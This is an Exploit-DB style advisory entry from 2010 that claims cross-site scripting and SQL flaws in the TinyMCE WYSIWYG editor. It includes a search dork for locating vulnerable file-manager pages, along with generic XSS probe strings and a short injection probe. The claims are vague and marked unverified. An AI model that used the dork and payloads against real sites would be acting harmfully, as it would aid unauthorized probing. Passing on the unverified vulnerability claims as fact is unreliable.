TinyMCE WYSIWYG Editor Multiple Vulnerabilities
# Title: TinyMCE WYSIWYG Editor Multiple Vulnerabilities
# EDB-ID: 11358
# CVE-ID: ()
# OSVDB-ID: ()
# Author: mc2_s3lector
# Published: 2010-02-07
# Verified: no
# Download Exploit Code
# Download N/A
# EDB-ID: 11358
# CVE-ID: ()
# OSVDB-ID: ()
# Author: mc2_s3lector
# Published: 2010-02-07
# Verified: no
# Download Exploit Code
# Download N/A
[+] Vurnerebility: *Js tiny_mce/tiny_mce WYSIWYG{java script} vurnerebility xss-->popup |
*& SQl implemented |
[+] Language : Java--,Xml |
[+] lisences : LGPL |
[+] Vendor : Moxiecode Systems AB |
[+] support : IE7J0/IE6.0/NS8.1-IE/NS8.1-G/FF2.0/O9.02; |
[+] Category : bug report |
[+] vendor : http://tinymce.moxiecode.com/ |
[+] implemented : joomla componen,drupal.. |
[+] Author : mc2_s3lector //yogyacarderlink.web.id |
[+] dork : powered:powered by CMS |
: inurl"file_manager.php?type=img" |
[+] Contact : www.yogyacarderlink.web.id |
[+]date : 4-2-10 |
[+] biGthank to : Allah,jasakom,KeDai Computerworks,n3ro,elpaciano,wandhy rifaldi,all indonesian like a coding, |
------------------------------------------------------------------------------------ |
--[Vulnerability sampling]-- |
------------------------------------------------------------------------------------------------------------------------- |
------------------------------------------------------------------------------------------------------------------------- |
# alert(String.fromCharCode(X1,X2,X3,X4))//";alert(String.fromCharCode(X1,X2,X3,x4))//\"; |
alert(String.fromCharCode(X1,X2,X3,x4))//-->">'> |
# |
------------------------------------------------------------------------------------------------------------------------- |
# '';!--" |
------------------------------------------------------------------------------------ |
|
Category Article Exploits
